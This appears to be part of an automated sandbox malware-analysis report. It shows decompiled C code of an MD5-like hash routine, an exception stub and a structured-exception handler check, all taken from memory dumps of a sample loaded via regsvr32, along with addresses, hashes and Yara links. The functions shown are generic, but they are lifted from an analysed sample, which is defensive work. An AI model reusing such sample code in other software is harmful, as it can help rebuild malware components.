                                    Function 001A4FA7, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E001A4FA7(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                                    0x001a4faa
                                    0x001a4fb5
                                    0x001a4fb8
                                    0x001a4fbb
                                    0x001a4fbc
                                    0x001a4fbc
                                    0x001a4fc7
                                    0x001a4fd8
                                    0x001a4fda
                                    0x001a4fdd
                                    0x001a4fdd
                                    0x001a4fe0
                                    0x001a4fe0
                                    0x001a4fe3
                                    0x001a4fe3
                                    0x001a4fe6
                                    0x001a4fe6
                                    0x001a5003
                                    0x001a5006
                                    0x001a501c
                                    0x001a501f
                                    0x001a5039
                                    0x001a503c
                                    0x001a5052
                                    0x001a5055
                                    0x001a5057
                                    0x001a506f
                                    0x001a5072
                                    0x001a5075
                                    0x001a508d
                                    0x001a5090
                                    0x001a50aa
                                    0x001a50ad
                                    0x001a50c3
                                    0x001a50c6
                                    0x001a50c8
                                    0x001a50e0
                                    0x001a50e5
                                    0x001a50e8
                                    0x001a50fe
                                    0x001a5101
                                    0x001a511b
                                    0x001a511e
                                    0x001a5134
                                    0x001a5137
                                    0x001a5139
                                    0x001a5154
                                    0x001a5157
                                    0x001a516e
                                    0x001a5171
                                    0x001a5175
                                    0x001a518e
                                    0x001a5191
                                    0x001a5193
                                    0x001a5196
                                    0x001a51b1
                                    0x001a51b4
                                    0x001a51cd
                                    0x001a51d0
                                    0x001a51e0
                                    0x001a51e3
                                    0x001a51fb
                                    0x001a51fe
                                    0x001a5218
                                    0x001a521b
                                    0x001a5233
                                    0x001a5236
                                    0x001a524c
                                    0x001a524f
                                    0x001a5267
                                    0x001a526a
                                    0x001a5282
                                    0x001a5285
                                    0x001a529f
                                    0x001a52a2
                                    0x001a52b8
                                    0x001a52bb
                                    0x001a52d3
                                    0x001a52d6
                                    0x001a52f0
                                    0x001a52f3
                                    0x001a530b
                                    0x001a530e
                                    0x001a5324
                                    0x001a5327
                                    0x001a533f
                                    0x001a5342
                                    0x001a535a
                                    0x001a535d
                                    0x001a536f
                                    0x001a5372
                                    0x001a5384
                                    0x001a5387
                                    0x001a5399
                                    0x001a539c
                                    0x001a53a0
                                    0x001a53b0
                                    0x001a53b3
                                    0x001a53c1
                                    0x001a53c4
                                    0x001a53d6
                                    0x001a53d9
                                    0x001a53ed
                                    0x001a53f0
                                    0x001a53f2
                                    0x001a5402
                                    0x001a5405
                                    0x001a5417
                                    0x001a541a
                                    0x001a5428
                                    0x001a542b
                                    0x001a543d
                                    0x001a5440
                                    0x001a5444
                                    0x001a5454
                                    0x001a5457
                                    0x001a5469
                                    0x001a546c
                                    0x001a547a
                                    0x001a547d
                                    0x001a548f
                                    0x001a5492
                                    0x001a54a4
                                    0x001a54a7
                                    0x001a54bb
                                    0x001a54be
                                    0x001a54d2
                                    0x001a54d5
                                    0x001a54e9
                                    0x001a54ec
                                    0x001a5500
                                    0x001a5503
                                    0x001a5517
                                    0x001a551a
                                    0x001a552e
                                    0x001a5533
                                    0x001a5545
                                    0x001a5548
                                    0x001a555c
                                    0x001a555f
                                    0x001a5573
                                    0x001a5576
                                    0x001a558c
                                    0x001a558f
                                    0x001a55a3
                                    0x001a55a6
                                    0x001a55b8
                                    0x001a55bb
                                    0x001a55cf
                                    0x001a55d2
                                    0x001a55e6
                                    0x001a55e9
                                    0x001a55fd
                                    0x001a5606
                                    0x001a5609
                                    0x001a5612
                                    0x001a561b
                                    0x001a5623
                                    0x001a562b
                                    0x001a5635
                                    0x001a564a

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID:
                                    • API String ID: 2221118986-0
                                    • Opcode ID: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                    • Instruction ID: 4b37d787df4365849c7b7b78807fa001c99f21cf708416e5834f622b7935c788
                                    • Opcode Fuzzy Hash: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                    • Instruction Fuzzy Hash: 1022847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2CC841, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E2CC83C,?,?,00000008,?,?,6E2CC4DC,00000000), ref: 6E2CCA6E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 5dbef556ad917679d9667abad86f5c1617844c0976f4b1c311ab57fab68aa60d
                                    • Instruction ID: ed05fa10ada0fd62e9699960988a07e5b8895f778be85f96af17dfb56cb16a4b
                                    • Opcode Fuzzy Hash: 5dbef556ad917679d9667abad86f5c1617844c0976f4b1c311ab57fab68aa60d
                                    • Instruction Fuzzy Hash: B5B1AE3122060ACFD785CF68C496B657BE1FF05B65F258658E8EACF2A1C335D981CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A8055, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A8055(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x1aa330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x1aa378 = 1;
										__eflags =  *0x1aa378;
										if( *0x1aa378 != 0) {
											goto L60;
										}
										_t84 =  *0x1aa330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x1aa378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x1aa330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x1aa338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1aa334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1aa338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1aa338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x1aa378 = 1;
							__eflags =  *0x1aa378;
							if( *0x1aa378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1aa338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x1aa338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x1aa378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x1aa338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x1aa330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x1aa338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1aa338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                    0x001a805f
                                    0x001a8062
                                    0x001a8068
                                    0x001a8086
                                    0x00000000
                                    0x001a8086
                                    0x001a8070
                                    0x001a8079
                                    0x001a807f
                                    0x001a808e
                                    0x001a8091
                                    0x001a8094
                                    0x001a809e
                                    0x001a809e
                                    0x001a80a0
                                    0x001a80a3
                                    0x001a80a5
                                    0x001a80a5
                                    0x001a80a7
                                    0x001a80aa
                                    0x00000000
                                    0x00000000
                                    0x001a80ac
                                    0x001a80ae
                                    0x001a8114
                                    0x001a8114
                                    0x001a8272
                                    0x00000000
                                    0x001a8272
                                    0x001a80b0
                                    0x001a80b0
                                    0x001a80b4
                                    0x001a80b6
                                    0x001a80b6
                                    0x001a80b6
                                    0x001a80b6
                                    0x001a80b9
                                    0x001a80ba
                                    0x001a80bd
                                    0x001a80bd
                                    0x001a80c1
                                    0x001a80c5
                                    0x001a80d3
                                    0x001a80d3
                                    0x001a80db
                                    0x001a80e1
                                    0x001a80e3
                                    0x001a80e5
                                    0x001a80f5
                                    0x001a8102
                                    0x001a8106
                                    0x001a810b
                                    0x001a810d
                                    0x001a818b
                                    0x001a818b
                                    0x001a810f
                                    0x001a810f
                                    0x001a810f
                                    0x001a818d
                                    0x001a818f
                                    0x001a8270
                                    0x001a8270
                                    0x00000000
                                    0x001a8195
                                    0x001a8195
                                    0x001a819c
                                    0x00000000
                                    0x00000000
                                    0x001a81a2
                                    0x001a81a6
                                    0x001a8202
                                    0x001a8204
                                    0x001a820c
                                    0x001a820e
                                    0x001a8210
                                    0x00000000
                                    0x00000000
                                    0x001a8212
                                    0x001a8218
                                    0x001a821a
                                    0x001a821c
                                    0x001a8231
                                    0x001a8231
                                    0x001a8233
                                    0x001a8262
                                    0x001a8269
                                    0x00000000
                                    0x001a8269
                                    0x001a8237
                                    0x001a8238
                                    0x001a823a
                                    0x001a823c
                                    0x001a823c
                                    0x001a823e
                                    0x001a8240
                                    0x001a8242
                                    0x001a8256
                                    0x001a8256
                                    0x001a8259
                                    0x001a825b
                                    0x001a825b
                                    0x001a825c
                                    0x001a825c
                                    0x00000000
                                    0x001a8244
                                    0x001a8244
                                    0x001a8244
                                    0x001a824d
                                    0x001a824e
                                    0x001a8250
                                    0x001a8252
                                    0x001a8252
                                    0x00000000
                                    0x001a8244
                                    0x001a8242
                                    0x001a821e
                                    0x001a8225
                                    0x001a8225
                                    0x001a8227
                                    0x00000000
                                    0x00000000
                                    0x001a8229
                                    0x001a822a
                                    0x001a822d
                                    0x001a822f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a822f
                                    0x00000000
                                    0x001a8225
                                    0x001a81a8
                                    0x001a81ab
                                    0x001a81b0
                                    0x00000000
                                    0x00000000
                                    0x001a81b9
                                    0x001a81bb
                                    0x001a81c1
                                    0x00000000
                                    0x00000000
                                    0x001a81c7
                                    0x001a81cd
                                    0x00000000
                                    0x00000000
                                    0x001a81d3
                                    0x001a81d5
                                    0x001a81de
                                    0x001a81e2
                                    0x00000000
                                    0x00000000
                                    0x001a81e8
                                    0x001a81eb
                                    0x001a81ed
                                    0x00000000
                                    0x00000000
                                    0x001a81f4
                                    0x001a81f6
                                    0x00000000
                                    0x00000000
                                    0x001a81f8
                                    0x001a81fc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a81fc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a80e7
                                    0x001a80e7
                                    0x001a80e7
                                    0x001a80ee
                                    0x00000000
                                    0x00000000
                                    0x001a80f0
                                    0x001a80f1
                                    0x001a80f3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a80f3
                                    0x001a811b
                                    0x001a811d
                                    0x00000000
                                    0x00000000
                                    0x001a812d
                                    0x001a812f
                                    0x001a8131
                                    0x00000000
                                    0x00000000
                                    0x001a8137
                                    0x001a813e
                                    0x001a816a
                                    0x001a816a
                                    0x001a816c
                                    0x001a816e
                                    0x001a8182
                                    0x001a8184
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a8170
                                    0x001a8170
                                    0x001a8170
                                    0x001a8179
                                    0x001a817a
                                    0x001a817c
                                    0x001a817e
                                    0x001a817e
                                    0x00000000
                                    0x001a8170
                                    0x001a8140
                                    0x001a8140
                                    0x001a8143
                                    0x001a8145
                                    0x001a8157
                                    0x001a8157
                                    0x001a815a
                                    0x001a815c
                                    0x001a815c
                                    0x001a815d
                                    0x001a815d
                                    0x001a8163
                                    0x001a8163
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a8147
                                    0x001a8147
                                    0x001a8147
                                    0x001a814e
                                    0x00000000
                                    0x00000000
                                    0x001a8150
                                    0x001a8150
                                    0x001a8151
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a8151
                                    0x001a8153
                                    0x001a8155
                                    0x001a8168
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a8168
                                    0x00000000
                                    0x001a8155
                                    0x001a80c7
                                    0x001a80ca
                                    0x001a80cd
                                    0x00000000
